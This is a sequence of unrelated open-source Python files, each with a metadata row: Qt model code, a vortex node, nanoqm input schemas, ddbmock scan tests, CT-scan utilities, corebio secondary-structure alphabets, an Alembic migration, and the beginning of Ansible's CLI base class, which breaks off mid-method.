start=start, end=end, view=self.proto_view, decoded=True,
subprotos=self.controller.protocol_list, update_label_ranges=False)
self.undo_stack.push(del_action)
def flags(self, index: QModelIndex):
if index.isValid():
alignment_offset = self.get_alignment_offset_at(index.row())
if index.column() < alignment_offset:
return Qt.ItemIsSelectable | Qt.ItemIsEnabled
if self.is_writeable:
return Qt.ItemIsEnabled | Qt.ItemIsEditable | Qt.ItemIsSelectable
else:
return Qt.ItemIsEnabled | Qt.ItemIsSelectable
else:
return Qt.NoItemFlags
| gpl-3.0 | 7,597,071,940,439,484,000 | 35.797101 | 114 | 0.634108 | false | 3.979624 | false | false | false |
dsparrow27/vortex | src/ds/vortex/nodes/conversion/toArray.py | 1 | 1063 | from ds.vortex.core import baseNode
from ds.vortex.core import plug as plugs
class ToArray(baseNode.BaseNode):
def __init__(self, name):
"""
:param name: str, the name of the node
"""
baseNode.BaseNode.__init__(self, name)
def initialize(self):
baseNode.BaseNode.initialize(self)
self.output = plugs.OutputPlug("output", self)
self.valuePlug_ = plugs.InputPlug("value", self, value=[])
self.addPlug(self.output, clean=True)
self.addPlug(self.valuePlug_, clean=True)
self.plugAffects(self.valuePlug_, self.output)
def compute(self, requestPlug):
baseNode.BaseNode.compute(self, requestPlug=requestPlug)
if not requestPlug == self.output:
return None
result = [self.valuePlug_.value]
requestPlug.value = result
requestPlug.dirty = False
return result
def getNode():
"""General function that returns our node, used to get create our node via Ui etc
:return: Node instance
"""
return ToArray
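# Illustrative sketch (not part of the original module): exercising the node
# directly. The plug API calls below (setting .value, passing the output plug
# to compute) are assumptions based on the code above, and initialize() may
# already be invoked by the BaseNode constructor in the real vortex core.
def _exampleToArrayUsage():
    node = getNode()("toArray1")
    node.initialize()
    node.valuePlug_.value = 5  # feed a scalar into the input plug
    return node.compute(node.output)  # expected to return [5]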
| mit | 5,942,302,473,169,311,000 | 29.371429 | 85 | 0.638758 | false | 3.837545 | false | false | false |
SCM-NV/qmworks-namd | nanoqm/workflows/schemas.py | 1 | 9939 | """Schemas to valid user input.
Index
-----
.. currentmodule:: nanoqm.workflows.schemas
.. autosummary::
{autosummary}
API
---
{autodata}
"""
__all__ = [
'schema_cp2k_general_settings',
'schema_derivative_couplings',
'schema_single_points',
'schema_distribute_absorption_spectrum',
'schema_distribute_derivative_couplings',
'schema_distribute_single_points',
'schema_absorption_spectrum',
'schema_ipr',
'schema_coop']
import os
from numbers import Real
import pkg_resources as pkg
from schema import And, Optional, Or, Schema, Use
from typing import Any, Dict, Iterable
def equal_lambda(name: str) -> And:
"""Create an schema checking that the keyword matches the expected value."""
return And(
str, Use(str.lower), lambda s: s == name)
def any_lambda(array: Iterable[str]) -> And:
"""Create an schema checking that the keyword matches one of the expected values."""
return And(
str, Use(str.lower), lambda s: s in array)
def merge(d1: Dict[str, Any], d2: Dict[str, Any]) -> Dict[str, Any]:
"""Merge two dictionaries using without modifying the original."""
x = d1.copy()
x.update(d2)
return x
#: Schema to validate the CP2K general settings
schema_cp2k_general_settings = Schema({
# "Basis set to carry out the quantum chemistry simulation"
"basis": str,
# "Pseudo-potential to carry out the quantum chemistry simulation"
"potential": str,
# Charge of the system
Optional("charge", default=0): int,
# Multiplicity
Optional("multiplicity", default=1): int,
# Specify the Cartesian components for the cell vector
"cell_parameters": Or(
Real,
lambda xs: len(xs) == 3 and isinstance(xs, list),
lambda xs: len(xs) == 3 and all(len(r) == 3 for r in xs)),
# Type of periodicity
"periodic": any_lambda(("none", "x", "y", "z", "xy", "xy", "yz", "xyz")),
# Specify the angles between the vectors defining the unit cell
Optional("cell_angles"): list,
# Path to the folder containing the basis set specifications
Optional("path_basis", default=pkg.resource_filename("nanoqm", "basis")): os.path.isdir,
# Settings describing the input of the quantum package
"cp2k_settings_main": object,
# Settings describing the input of the quantum package
# to compute the guess wavefunction"
"cp2k_settings_guess": object,
# Restart File Name
Optional("wfn_restart_file_name", default=None): Or(str, None),
# File containing the Parameters of the cell if those
# parameters change during the MD simulation.
Optional("file_cell_parameters", default=None): Or(str, None),
    # Quality of the auxiliary basis cFIT
Optional("aux_fit", default="verygood"):
any_lambda(("low", "medium", "good", "verygood", "excellent")),
# executable name
Optional("executable", default="cp2k.popt"): any_lambda(
[f"cp2k.{ext}" for ext in (
# Serial single core testing and debugging
"sdbg",
# Serial general single core usage
"sopt",
# Parallel (only OpenMP), single node, multi core
"ssmp",
# Parallel (only MPI) multi-node testing and debugging
"pdbg",
# Parallel (only MPI) general usage, no threads
"popt",
# parallel (MPI + OpenMP) general usage, threading might improve scalability and memory usage
"psmp"
)])
})
#: Dictionary with the options common to all workflows
dict_general_options = {
# Number of occupied/virtual orbitals to use
Optional('active_space', default=[10, 10]): And(list, lambda xs: len(xs) == 2),
# Index of the HOMO
Optional("nHOMO"): int,
# Index of the orbitals to compute the couplings
Optional("mo_index_range"): tuple,
# "default quantum package used"
Optional("package_name", default="cp2k"): str,
# project
Optional("project_name", default="namd"): str,
# Working directory
Optional("scratch_path", default=None): Or(None, str),
# path to the HDF5 to store the results
Optional("path_hdf5", default="quantum.hdf5"): str,
# path to xyz trajectory of the Molecular dynamics
"path_traj_xyz": os.path.exists,
    # Index from which to start enumerating the folders created for each point
# in the MD
Optional("enumerate_from", default=0): int,
# Ignore the warning issues by the quantum package and keep computing
Optional("ignore_warnings", default=False): bool,
# Calculate the guess wave function in either the first point of the
# trajectory or in all
Optional("calculate_guesses", default="first"):
any_lambda(("first", "all")),
# Units of the molecular geometry on the MD file
Optional("geometry_units", default="angstrom"):
any_lambda(("angstrom", "au")),
# Integration time step used for the MD (femtoseconds)
Optional("dt", default=1): Real,
# Deactivate the computation of the orbitals for debugging purposes
Optional("compute_orbitals", default=True): bool,
# General settings
"cp2k_general_settings": schema_cp2k_general_settings
}
#: Dict with input options to run a derivate coupling workflow
dict_derivative_couplings = {
# Name of the workflow to run
"workflow": equal_lambda("derivative_couplings"),
# Algorithm used to compute the derivative couplings
Optional("algorithm", default="levine"):
any_lambda(("levine", "3points")),
# Use MPI to compute the couplings
Optional("mpi", default=False): bool,
# Track the crossing between states
Optional("tracking", default=True): bool,
# Write the overlaps in ascii
Optional("write_overlaps", default=False): bool,
# Compute the overlap between molecular geometries using a dephase"
Optional("overlaps_deph", default=False): bool
}
dict_merged_derivative_couplings = merge(
dict_general_options, dict_derivative_couplings)
#: Schema to validate the input for a derivative coupling calculation
schema_derivative_couplings = Schema(
dict_merged_derivative_couplings)
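# Illustrative sketch (not part of the original module): validating a minimal
# user input against the schema above. All values below are placeholders, and
# ``path_traj_xyz`` must point to an existing file for the os.path.exists
# check to succeed.
def _example_validate_derivative_couplings():
    """Hypothetical call to Schema.validate; returns the normalized dict."""
    user_input = {
        "workflow": "derivative_couplings",
        "path_traj_xyz": "traj.xyz",  # placeholder, must exist on disk
        "cp2k_general_settings": {
            "basis": "DZVP-MOLOPT-SR-GTH",
            "potential": "GTH-PBE",
            "cell_parameters": 25.0,
            "periodic": "xyz",
            "cp2k_settings_main": {},
            "cp2k_settings_guess": {},
        },
    }
    return schema_derivative_couplings.validate(user_input)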
#: Schema to validate the input for a job scheduler
schema_job_scheduler = Schema({
Optional("scheduler", default="slurm"):
any_lambda(("slurm", "pbs")),
Optional("nodes", default=1): int,
Optional("tasks", default=1): int,
Optional("wall_time", default="01:00:00"): str,
Optional("job_name", default="namd"): str,
Optional("queue_name", default="short"): str,
Optional("load_modules", default=""): str,
Optional("free_format", default=""): str
})
#: Input options to distribute a job
dict_distribute = {
Optional("workdir", default=os.getcwd()): str,
# Number of chunks to split the trajectory
"blocks": int,
# Resource manager configuration
"job_scheduler": schema_job_scheduler,
# General settings
"cp2k_general_settings": schema_cp2k_general_settings,
}
#: input to distribute a derivative coupling job
dict_distribute_derivative_couplings = {
# Name of the workflow to run
"workflow": equal_lambda("distribute_derivative_couplings")
}
#: Schema to validate the input to distribute a derivate coupling calculation
schema_distribute_derivative_couplings = Schema(
merge(
dict_distribute,
merge(
dict_merged_derivative_couplings,
dict_distribute_derivative_couplings)))
#: Input for an absorption spectrum calculation
dict_absorption_spectrum = {
# Name of the workflow to run
"workflow": equal_lambda("absorption_spectrum"),
# Type of TDDFT calculations. Available: sing_orb, stda, stddft
Optional("tddft", default="stda"): And(
str, Use(str.lower), lambda s: s in ("sing_orb", "stda", "stdft")),
# Interval between MD points where the oscillators are computed"
Optional("stride", default=1): int,
    # Exchange-correlation functional used in the DFT calculations
Optional("xc_dft", default="pbe"): str
}
dict_merged_absorption_spectrum = merge(
dict_general_options, dict_absorption_spectrum)
#: Schema to validate the input for an absorption spectrum calculation
schema_absorption_spectrum = Schema(dict_merged_absorption_spectrum)
dict_distribute_absorption_spectrum = {
# Name of the workflow to run
"workflow": equal_lambda("distribute_absorption_spectrum")
}
schema_distribute_absorption_spectrum = Schema(
merge(dict_distribute, merge(
dict_merged_absorption_spectrum, dict_distribute_absorption_spectrum)))
dict_single_points = {
# Name of the workflow to run
"workflow": any_lambda(("single_points", "ipr_calculation", "coop_calculation")),
# General settings
"cp2k_general_settings": schema_cp2k_general_settings
}
#: input to distribute single point calculations
dict_distribute_single_points = {
# Name of the workflow to run
"workflow": equal_lambda("distribute_single_points")
}
#: Input for a Crystal Orbital Overlap Population calculation
dict_coop = {
# List of the two elements to calculate the COOP for
"coop_elements": list}
dict_merged_single_points = merge(dict_general_options, dict_single_points)
#: Schema to validate the input of a single point calculation
schema_single_points = Schema(dict_merged_single_points)
#: Schema to validate the input for a Inverse Participation Ratio calculation
schema_ipr = schema_single_points
#: Input for a Crystal Orbital Overlap Population calculation
dict_merged_coop = merge(dict_merged_single_points, dict_coop)
#: Schema to validate the input for a Crystal Orbital Overlap Population calculation
schema_coop = Schema(dict_merged_coop)
#: Schema to validate the input to distribute a single point calculation
schema_distribute_single_points = Schema(
merge(dict_distribute, merge(
dict_merged_single_points, dict_distribute_single_points)))
| mit | 6,000,909,809,273,182,000 | 29.770898 | 105 | 0.683268 | false | 3.809506 | false | false | false |
dekked/dynamodb-mock | tests/functional/pyramid/test_scan.py | 1 | 4232 | # -*- coding: utf-8 -*-
import unittest, json
TABLE_NAME1 = 'Table-1'
TABLE_RT = 45
TABLE_WT = 123
TABLE_NAME = 'Table-HR'
TABLE_RT = 45
TABLE_WT = 123
TABLE_RT2 = 10
TABLE_WT2 = 10
TABLE_HK_NAME = u'hash_key'
TABLE_HK_TYPE = u'N'
TABLE_RK_NAME = u'range_key'
TABLE_RK_TYPE = u'S'
HK_VALUE1 = u'123'
HK_VALUE2 = u'456'
HK_VALUE3 = u'789'
RK_VALUE1 = u'Waldo-1'
RK_VALUE2 = u'Waldo-2'
RK_VALUE3 = u'Waldo-3'
RK_VALUE4 = u'Waldo-4'
RK_VALUE5 = u'Waldo-5'
ITEM1 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE1},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE1},
u'relevant_data': {u'S': u'tata'},
}
ITEM2 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE1},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE2},
u'relevant_data': {u'S': u'tete'},
}
ITEM3 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE2},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE3},
u'relevant_data': {u'S': u'titi'},
}
ITEM4 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE3},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE4},
u'relevant_data': {u'S': u'toto'},
}
ITEM5 = {
TABLE_HK_NAME: {TABLE_HK_TYPE: HK_VALUE3},
TABLE_RK_NAME: {TABLE_RK_TYPE: RK_VALUE5},
u'relevant_data': {u'S': u'tutu'},
}
HEADERS = {
'x-amz-target': 'dynamodb_20111205.Scan',
'content-type': 'application/x-amz-json-1.0',
}
# Goal here is not to test the full API, this is done by the Boto tests
class TestScan(unittest.TestCase):
def setUp(self):
from ddbmock.database.db import dynamodb
from ddbmock.database.table import Table
from ddbmock.database.key import PrimaryKey
from ddbmock import main
app = main({})
from webtest import TestApp
self.app = TestApp(app)
dynamodb.hard_reset()
hash_key = PrimaryKey(TABLE_HK_NAME, TABLE_HK_TYPE)
range_key = PrimaryKey(TABLE_RK_NAME, TABLE_RK_TYPE)
self.t1 = Table(TABLE_NAME, TABLE_RT, TABLE_WT, hash_key, range_key)
dynamodb.data[TABLE_NAME] = self.t1
self.t1.put(ITEM1, {})
self.t1.put(ITEM2, {})
self.t1.put(ITEM3, {})
self.t1.put(ITEM4, {})
self.t1.put(ITEM5, {})
def tearDown(self):
from ddbmock.database.db import dynamodb
dynamodb.hard_reset()
def test_scan_condition_filter_fields(self):
from ddbmock.database.db import dynamodb
request = {
"TableName": TABLE_NAME,
"ScanFilter": {
"relevant_data": {
"AttributeValueList": [{"S":"toto"},{"S":"titi"},{"S":"tata"}],
"ComparisonOperator": "IN",
},
},
"AttributesToGet": [u'relevant_data'],
}
expected = {
u"Count": 3,
u"ScannedCount": 5,
u"Items": [
{u"relevant_data": {u"S": u"tata"}},
{u"relevant_data": {u"S": u"toto"}},
{u"relevant_data": {u"S": u"titi"}},
],
u"ConsumedCapacityUnits": 0.5,
}
# Protocol check
res = self.app.post_json('/', request, HEADERS, status=200)
self.assertEqual(expected, json.loads(res.body))
self.assertEqual('application/x-amz-json-1.0; charset=UTF-8', res.headers['Content-Type'])
def test_scan_count_and_attrs_to_get_fails(self):
from ddbmock.database.db import dynamodb
request = {
"TableName": TABLE_NAME,
"ScanFilter": {
"relevant_data": {
"AttributeValueList": [{"S":"toto"},{"S":"titi"},{"S":"tata"}],
"ComparisonOperator": "IN",
},
},
"AttributesToGet": [u'relevant_data'],
"Count": True,
}
expected = {
u'__type': u'com.amazonaws.dynamodb.v20111205#ValidationException',
u'message': u'Can not filter fields when only count is requested'
}
# Protocol check
res = self.app.post_json('/', request, HEADERS, status=400)
self.assertEqual(expected, json.loads(res.body))
self.assertEqual('application/x-amz-json-1.0; charset=UTF-8', res.headers['Content-Type'])
| lgpl-3.0 | -856,757,890,835,981,000 | 27.986301 | 98 | 0.559074 | false | 2.982382 | true | false | false |
yancz1989/cancer | utilities.py | 1 | 4491 | import SimpleITK as sitk
import numpy as np
import csv
import os
import json
from PIL import Image
import matplotlib.pyplot as plt
from cv2 import imread, imwrite
def load_itk_image(filename):
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing
def readCSV(filename):
lines = []
with open(filename, "rb") as f:
csvreader = csv.reader(f)
for line in csvreader:
lines.append(line)
return lines
def voxel_2_world(voxel_coord, itkimage):
world_coord = list(reversed(
itkimage.TransformContinuousIndexToPhysicalPoint(list(reversed(voxel_coord)))))
return world_coord
def voxelCoordToWorld(voxelCoord, origin, spacing):
stretchedVoxelCoord = voxelCoord * spacing
worldCoord = stretchedVoxelCoord + origin
return worldCoord
def worldToVoxelCoord(worldCoord, origin, spacing):
stretchedVoxelCoord = np.absolute(worldCoord - origin)
voxelCoord = stretchedVoxelCoord / spacing
return voxelCoord
def normalizePlanes(npzarray):
maxHU = 400.
minHU = -1000.
npzarray = (npzarray - minHU) / (maxHU - minHU)
npzarray[npzarray > 1] = 1.
npzarray[npzarray < 0] = 0.
return npzarray
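# Illustrative sketch (not part of the original module): typical use of the
# helpers above on one LUNA16-style scan. The .mhd path and the candidate
# world coordinate below are placeholders.
def exampleNormalizeSlice(mhd_path='subset0/case.mhd',
                          world_coord=(-100.0, 50.0, -75.0)):
  numpyImage, numpyOrigin, numpySpacing = load_itk_image(mhd_path)
  voxel = worldToVoxelCoord(np.asarray(world_coord), numpyOrigin, numpySpacing)
  # take the axial slice containing the candidate and map HU into [0, 1]
  return normalizePlanes(numpyImage[int(voxel[0])])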
def readFileNameMap(map_filename):
file_map = {}
with open(map_filename) as map_file:
file_name_list = json.load(map_file)
for it in file_name_list:
file_map[it['ID_name']] = it['long_name']
return file_map
def parse_image_file(filename):
cols = filename.split("-")
subset = cols[0]
key = cols[1]
z_axis = int(cols[2])
return key, subset[:subset.index('/')], z_axis
def filterBoxes(boxes, threshold):
filtered_boxes = []
for box in boxes:
if box[4] >= threshold:
filtered_boxes.append(box)
return filtered_boxes
def readResultMap(result_filename, file_map, threshold):
result_map = {}
with open(result_filename) as result_file:
result_list = json.load(result_file)
for it in result_list:
filename = it['file']
key = file_map[filename]
key = os.path.splitext(key)[0]
boxes = it['box']
boxes = filterBoxes(boxes, threshold)
if not result_map.get(key):
result_map[key] = []
cols = filename.split('_')
index = int(cols[2])
result_map[key].append((index, boxes))
for key, val in result_map.iteritems():
val.sort()
return result_map
def readImageMap(filename):
lines = readCSV(filename)
result = {}
for line in lines[1:]:
worldCoord = np.asarray(
[float(line[3]), float(line[2]), float(line[1])])
radius = float(line[4]) / 2.0 + 1.0
if not result.get(line[0]):
result[line[0]] = []
result[line[0]].append((worldCoord, radius))
return result
def trans(boxes, H, confs, thr = -1.0):
gw = H['grid_width']
gh = H['grid_height']
cell_pix_size = H['region_size']
rnnl = H['rnn_len']
ncls = H['num_classes']
boxes = np.reshape(boxes, (-1, gh, gw, rnnl, 4))
confs = np.reshape(confs, (-1, gh, gw, rnnl, ncls))
ret = []
for i in range(rnnl):
for y in range(gh):
for x in range(gw):
if np.max(confs[0, y, x, i, 1:]) > thr:
box = boxes[0, y, x, i, :]
abs_cx = int(box[0]) + cell_pix_size/2 + cell_pix_size * x
abs_cy = int(box[1]) + cell_pix_size/2 + cell_pix_size * y
w = box[2]
h = box[3]
ret.append([abs_cx, abs_cy, w, h, np.max(confs[0, y, x, i, 1: ])])
return np.array(ret)
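# Illustrative sketch (not part of the original module): the hypernetwork
# config keys that trans() expects. The grid and cell sizes below are
# placeholders for a 640x480 input with 32-pixel cells.
def exampleTrans(boxes, confs):
  H = {'grid_width': 20, 'grid_height': 15, 'region_size': 32,
       'rnn_len': 1, 'num_classes': 2}
  # keep only detections whose confidence exceeds 0.5
  return trans(boxes, H, confs, thr=0.5)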
def split(meta_root, samples):
np.random.seed(2012310818)
l = len(samples)
idxes = np.random.permutation(np.arange(l))
  train = [samples[i] for i in idxes[0 : int(l * 0.7)]]
  vals = [samples[i] for i in idxes[int(l * 0.7) : ]]
with open(meta_root + 'train.json', 'w') as g:
json.dump(train, g)
with open(meta_root + 'vals.json', 'w') as g:
json.dump(vals, g)
def writeCSV(filename, lines):
with open(filename, "wb") as f:
csvwriter = csv.writer(f)
csvwriter.writerows(lines)
def tryFloat(value):
try:
value = float(value)
except:
value = value
return value
def getColumn(lines, columnid, elementType=''):
column = []
for line in lines:
try:
value = line[columnid]
except:
continue
if elementType == 'float':
value = tryFloat(value)
column.append(value)
return column
def mkdir(d):
if not os.path.exists(d):
os.mkdir(d)
| mit | 5,996,328,860,083,202,000 | 25.417647 | 83 | 0.643732 | false | 2.988024 | false | false | false |
go-bears/Final-Project | weblogo-3.4_rd/corebio/secstruc/__init__.py | 1 | 1920 |
""" Protein secondary structure and associated tools and data.
Constants:
- secstruc_alphabet
-- Secondary structure alphabet: 'HGIEBbTSC _-L?X'
Contains a complete set of secondary structure codes generated by both
STRIDE and DSSP
- secstruc_ehl_alphabet
-- Standard 3 state secondary structure alphabet: EHLX
E : Extended strand
H : Helix
L : Loop
X : Unknown
There are two common ways of reducing the full secondary structure alphabet to
the simpler three letter EHL alphabet. The EHL reduction converts 3/10 and pi
helixes to H (helix) and beta-bridges to strands (E), whereas the FA reduction
converts all non-canonical helixes and strands to L (loop). The FA reduction is
more predictable.
- fa_reduce_secstruc_to_ehl
- reduce_secstruc_to_ehl
Usage :
>>> from corebio.secstruc import *
>>> record = dssp.DsspRecord( open('test_corebio/data/1crn.dssp') )
>>> record.secondary()
' EE SSHHHHHHHHHHHTTT HHHHHHHHS EE SSS GGG '
>>> fa_reduce_secstruc_to_ehl(record.secondary())
'LEELLLHHHHHHHHHHHLLLLLHHHHHHHHLLEELLLLLLLLLLLL'
"""
from __future__ import absolute_import
__all__ = ['dssp', 'stride','secstruc_alphabet','secstruc_ehl_alphabet',
'fa_reduce_secstruc_to_ehl', 'ehl_reduce_secstruc_to_ehl']
from ..seq import Alphabet, Seq
from ..transform import Transform
# ------------------- SECONDARY STRUCTURE ALPHABETS -------------------
secstruc_alphabet = Alphabet("HGIEBbTSC _-L?X")
secstruc_ehl_alphabet = Alphabet("EHLX")
fa_reduce_secstruc_to_ehl = \
Transform( Seq("HGIEBbTSC _-L?X", secstruc_alphabet),
Seq("HLLELLLLLLLLLXX", secstruc_ehl_alphabet) )
ehl_reduce_secstruc_to_ehl = \
Transform( Seq("HGIEBbTSC _-L?X", secstruc_alphabet),
Seq("HHHEEELLLLLLLXX", secstruc_ehl_alphabet) )
| mit | -110,092,327,526,944,400 | 32.684211 | 79 | 0.655729 | false | 3.194676 | false | true | false |
hasgeek/funnel | migrations/versions/daeb6753652a_add_profile_protected_and_verified_flags.py | 1 | 1186 | """Add profile protected and verified flags.
Revision ID: daeb6753652a
Revises: 8b46a8a8ca17
Create Date: 2020-11-06 02:57:05.891627
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'daeb6753652a'
down_revision = '8b46a8a8ca17'
branch_labels = None
depends_on = None
def upgrade():
op.add_column(
'profile',
sa.Column(
'is_protected',
sa.Boolean(),
nullable=False,
server_default=sa.sql.expression.false(),
),
)
op.alter_column('profile', 'is_protected', server_default=None)
op.add_column(
'profile',
sa.Column(
'is_verified',
sa.Boolean(),
nullable=False,
server_default=sa.sql.expression.false(),
),
)
op.alter_column('profile', 'is_verified', server_default=None)
op.create_index(
op.f('ix_profile_is_verified'), 'profile', ['is_verified'], unique=False
)
def downgrade():
op.drop_index(op.f('ix_profile_is_verified'), table_name='profile')
op.drop_column('profile', 'is_verified')
op.drop_column('profile', 'is_protected')
| agpl-3.0 | -5,126,532,979,559,593,000 | 23.708333 | 80 | 0.607926 | false | 3.378917 | false | false | false |
xen0l/ansible | lib/ansible/cli/__init__.py | 1 | 40009 | # (c) 2012-2014, Michael DeHaan <[email protected]>
# (c) 2016, Toshio Kuratomi <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import getpass
import operator
import optparse
import os
import subprocess
import re
import sys
import time
import yaml
from abc import ABCMeta, abstractmethod
import ansible
from ansible import constants as C
from ansible.errors import AnsibleOptionsError, AnsibleError
from ansible.inventory.manager import InventoryManager
from ansible.module_utils.six import with_metaclass, string_types
from ansible.module_utils._text import to_bytes, to_text
from ansible.parsing.dataloader import DataLoader
from ansible.release import __version__
from ansible.utils.path import unfrackpath
from ansible.utils.vars import load_extra_vars, load_options_vars
from ansible.vars.manager import VariableManager
from ansible.parsing.vault import PromptVaultSecret, get_file_vault_secret
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class SortedOptParser(optparse.OptionParser):
'''Optparser which sorts the options by opt before outputting --help'''
def format_help(self, formatter=None, epilog=None):
self.option_list.sort(key=operator.methodcaller('get_opt_string'))
return optparse.OptionParser.format_help(self, formatter=None)
# Note: Inherit from SortedOptParser so that we get our format_help method
class InvalidOptsParser(SortedOptParser):
'''Ignore invalid options.
Meant for the special case where we need to take care of help and version
but may not know the full range of options yet. (See it in use in set_action)
'''
def __init__(self, parser):
# Since this is special purposed to just handle help and version, we
# take a pre-existing option parser here and set our options from
# that. This allows us to give accurate help based on the given
# option parser.
SortedOptParser.__init__(self, usage=parser.usage,
option_list=parser.option_list,
option_class=parser.option_class,
conflict_handler=parser.conflict_handler,
description=parser.description,
formatter=parser.formatter,
add_help_option=False,
prog=parser.prog,
epilog=parser.epilog)
self.version = parser.version
def _process_long_opt(self, rargs, values):
try:
optparse.OptionParser._process_long_opt(self, rargs, values)
except optparse.BadOptionError:
pass
def _process_short_opts(self, rargs, values):
try:
optparse.OptionParser._process_short_opts(self, rargs, values)
except optparse.BadOptionError:
pass
class CLI(with_metaclass(ABCMeta, object)):
''' code behind bin/ansible* programs '''
VALID_ACTIONS = []
_ITALIC = re.compile(r"I\(([^)]+)\)")
_BOLD = re.compile(r"B\(([^)]+)\)")
_MODULE = re.compile(r"M\(([^)]+)\)")
_URL = re.compile(r"U\(([^)]+)\)")
_CONST = re.compile(r"C\(([^)]+)\)")
PAGER = 'less'
# -F (quit-if-one-screen) -R (allow raw ansi control chars)
# -S (chop long lines) -X (disable termcap init and de-init)
LESS_OPTS = 'FRSX'
SKIP_INVENTORY_DEFAULTS = False
def __init__(self, args, callback=None):
"""
Base init method for all command line programs
"""
self.args = args
self.options = None
self.parser = None
self.action = None
self.callback = callback
def set_action(self):
"""
Get the action the user wants to execute from the sys argv list.
"""
for i in range(0, len(self.args)):
arg = self.args[i]
if arg in self.VALID_ACTIONS:
self.action = arg
del self.args[i]
break
if not self.action:
# if we're asked for help or version, we don't need an action.
# have to use a special purpose Option Parser to figure that out as
# the standard OptionParser throws an error for unknown options and
# without knowing action, we only know of a subset of the options
# that could be legal for this command
tmp_parser = InvalidOptsParser(self.parser)
tmp_options, tmp_args = tmp_parser.parse_args(self.args)
if not(hasattr(tmp_options, 'help') and tmp_options.help) or (hasattr(tmp_options, 'version') and tmp_options.version):
raise AnsibleOptionsError("Missing required action")
def execute(self):
"""
Actually runs a child defined method using the execute_<action> pattern
"""
fn = getattr(self, "execute_%s" % self.action)
fn()
@abstractmethod
def run(self):
"""Run the ansible command
Subclasses must implement this method. It does the actual work of
running an Ansible command.
"""
display.vv(to_text(self.parser.get_version()))
if C.CONFIG_FILE:
display.v(u"Using %s as config file" % to_text(C.CONFIG_FILE))
else:
display.v(u"No config file found; using defaults")
# warn about deprecated config options
for deprecated in C.config.DEPRECATED:
name = deprecated[0]
why = deprecated[1]['why']
if 'alternatives' in deprecated[1]:
alt = ', use %s instead' % deprecated[1]['alternatives']
else:
alt = ''
ver = deprecated[1]['version']
display.deprecated("%s option, %s %s" % (name, why, alt), version=ver)
@staticmethod
def split_vault_id(vault_id):
# return (before_@, after_@)
# if no @, return whole string as after_
if '@' not in vault_id:
return (None, vault_id)
parts = vault_id.split('@', 1)
ret = tuple(parts)
return ret
@staticmethod
def build_vault_ids(vault_ids, vault_password_files=None,
ask_vault_pass=None, create_new_password=None,
auto_prompt=True):
vault_password_files = vault_password_files or []
vault_ids = vault_ids or []
# convert vault_password_files into vault_ids slugs
for password_file in vault_password_files:
id_slug = u'%s@%s' % (C.DEFAULT_VAULT_IDENTITY, password_file)
            # note this makes --vault-id higher precedence than --vault-password-file
# if we want to intertwingle them in order probably need a cli callback to populate vault_ids
# used by --vault-id and --vault-password-file
vault_ids.append(id_slug)
        # if an action needs an encrypt password (create_new_password=True) and we don't
        # have other secrets set up, then automatically add a password prompt as well.
        # prompts can't/shouldn't work without a tty, so don't add prompt secrets
if ask_vault_pass or (not vault_ids and auto_prompt):
id_slug = u'%s@%s' % (C.DEFAULT_VAULT_IDENTITY, u'prompt_ask_vault_pass')
vault_ids.append(id_slug)
return vault_ids
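    # Illustrative sketch (not part of upstream Ansible): the slug format the
    # method above produces. With vault_ids=['dev@prompt'],
    # vault_password_files=['~/.vault_pass'] and ask_vault_pass=False, the
    # returned list would be
    #   ['dev@prompt', 'default@~/.vault_pass']
    # where 'default' is C.DEFAULT_VAULT_IDENTITY; an extra
    # 'default@prompt_ask_vault_pass' entry is appended when ask_vault_pass
    # is set (or when no other secrets were given and auto_prompt is True).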
# TODO: remove the now unused args
@staticmethod
def setup_vault_secrets(loader, vault_ids, vault_password_files=None,
ask_vault_pass=None, create_new_password=False,
auto_prompt=True):
# list of tuples
vault_secrets = []
# Depending on the vault_id value (including how --ask-vault-pass / --vault-password-file create a vault_id)
# we need to show different prompts. This is for compat with older Towers that expect a
        # certain vault password prompt format, so 'prompt_ask_vault_pass' vault_id gets the old format.
prompt_formats = {}
# If there are configured default vault identities, they are considered 'first'
# so we prepend them to vault_ids (from cli) here
vault_password_files = vault_password_files or []
if C.DEFAULT_VAULT_PASSWORD_FILE:
vault_password_files.append(C.DEFAULT_VAULT_PASSWORD_FILE)
if create_new_password:
prompt_formats['prompt'] = ['New vault password (%(vault_id)s): ',
                                        'Confirm new vault password (%(vault_id)s): ']
# 2.3 format prompts for --ask-vault-pass
prompt_formats['prompt_ask_vault_pass'] = ['New Vault password: ',
'Confirm New Vault password: ']
else:
prompt_formats['prompt'] = ['Vault password (%(vault_id)s): ']
# The format when we use just --ask-vault-pass needs to match 'Vault password:\s*?$'
prompt_formats['prompt_ask_vault_pass'] = ['Vault password: ']
vault_ids = CLI.build_vault_ids(vault_ids,
vault_password_files,
ask_vault_pass,
create_new_password,
auto_prompt=auto_prompt)
for vault_id_slug in vault_ids:
vault_id_name, vault_id_value = CLI.split_vault_id(vault_id_slug)
if vault_id_value in ['prompt', 'prompt_ask_vault_pass']:
# --vault-id some_name@prompt_ask_vault_pass --vault-id other_name@prompt_ask_vault_pass will be a little
# confusing since it will use the old format without the vault id in the prompt
built_vault_id = vault_id_name or C.DEFAULT_VAULT_IDENTITY
